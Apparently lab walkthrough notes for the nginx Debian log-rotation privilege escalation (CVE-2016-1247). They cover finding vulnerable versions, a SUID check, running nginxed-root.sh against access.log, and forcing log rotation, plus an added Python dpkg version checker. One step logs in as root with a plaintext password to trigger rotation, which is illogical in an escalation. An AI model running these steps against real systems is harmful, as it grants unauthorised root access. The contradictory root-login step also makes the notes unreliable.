Resources:
https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
Because of how the server's log files are handled, they can be abused to escalate from www-data to root.
How to find it?
Run linux-exploit-suggester:
[+] [CVE-2016-1247] nginxed-root.sh
Details: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
Tags: debian=8,ubuntu=14.04|16.04|16.10
Download URL: https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh
Comments: Rooting depends on cron.daily (up to 24h of dealy). Affected: deb8: <1.6.2; 14.04: <1.4.6; 16.04: 1.10.0
anything under 1.6.2 is affected.
manual check:
dpkg -l | grep nginx
ii nginx-common 1.6.2-5+deb8u2~bpo70+1 small, powerful, scalable web/proxy server - common files
ii nginx-full 1.6.2-5+deb8u2~bpo70+1 nginx web/proxy server (standard version)
these are affected!
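To make the manual check above reproducible (for example in an audit script), the following is an added helper that is not part of the walkthrough or the advisory: it reimplements dpkg's version ordering in Python, so that a backport suffix such as `~bpo70+1` sorts the way `dpkg --compare-versions` would, and flags installed nginx rows older than a fixed version you pass in. The fixed version used in the demo call is a placeholder chosen only to show the tilde ordering; take the real value from your distribution's security advisory.

```python
"""Added helper (not from the page or the advisory): dpkg-style version ordering
in Python plus a check over `dpkg -l` output for nginx packages older than a fix."""
import re

def _weight(c):
    # dpkg ordering for non-digit characters: '~' < end-of-string < letters < others
    if c == "~":
        return -1
    if c == "":
        return 0
    return ord(c) if c.isalpha() else ord(c) + 256

def _frag_cmp(a, b):
    """Compare two version fragments by alternating non-digit and numeric runs."""
    while a or b:
        na, nb = re.match(r"\D*", a).group(), re.match(r"\D*", b).group()
        for i in range(max(len(na), len(nb)) + 1):
            d = _weight(na[i:i + 1]) - _weight(nb[i:i + 1])
            if d:
                return d
        a, b = a[len(na):], b[len(nb):]
        da, db = re.match(r"\d*", a).group(), re.match(r"\d*", b).group()
        d = int(da or 0) - int(db or 0)
        if d:
            return d
        a, b = a[len(da):], b[len(db):]
    return 0

def dpkg_compare(v1, v2):
    """<0, 0 or >0 like `dpkg --compare-versions`: epoch, then upstream, then revision."""
    def parts(v):
        epoch, _, rest = v.partition(":") if ":" in v else ("0", "", v)
        up, _, rev = rest.rpartition("-") if "-" in rest else (rest, "", "")
        return int(epoch), up, rev
    e1, u1, r1 = parts(v1)
    e2, u2, r2 = parts(v2)
    return (e1 - e2) or _frag_cmp(u1, u2) or _frag_cmp(r1, r2)

def outdated_nginx(dpkg_output, fixed_version):
    """Return (package, version) for installed ('ii') nginx rows older than fixed_version."""
    hits = []
    for line in dpkg_output.splitlines():
        f = line.split()
        if len(f) >= 3 and f[0] == "ii" and f[1].startswith("nginx"):
            if dpkg_compare(f[2], fixed_version) < 0:
                hits.append((f[1], f[2]))
    return hits

# Constructed copy of the two rows shown by `dpkg -l | grep nginx` on this page.
DPKG_SAMPLE = """\
ii nginx-common 1.6.2-5+deb8u2~bpo70+1 small, powerful, scalable web/proxy server - common files
ii nginx-full 1.6.2-5+deb8u2~bpo70+1 nginx web/proxy server (standard version)
"""

if __name__ == "__main__":
    # Placeholder threshold: the ~bpo backport sorts below its base revision.
    for pkg, ver in outdated_nginx(DPKG_SAMPLE, "1.6.2-5+deb8u2"):
        print(f"{pkg} {ver} is older than the fixed version")
```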
the exploit relies on the suid bit being set on sudo:
find / -type f -perm -04000 -ls 2>/dev/null
812578 172 -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo
check log files and perms:
ls -la /var/log/nginx
www-data's access to these log files, combined with log rotation running as root, is what gets abused
remember the log file names
cd to tools/nginx for the nginxed-root.sh:
cd /home/user/tools/nginx
./nginxed-root.sh /var/log/nginx/access.log
rather than waiting up to 24h for cron.daily, trigger the rotation yourself: ssh in again as root
ssh root@10.10.47.240
password123
then trigger the nginx log rotation:
invoke-rc.d nginx rotate >/dev/null 2>&1
and we get root: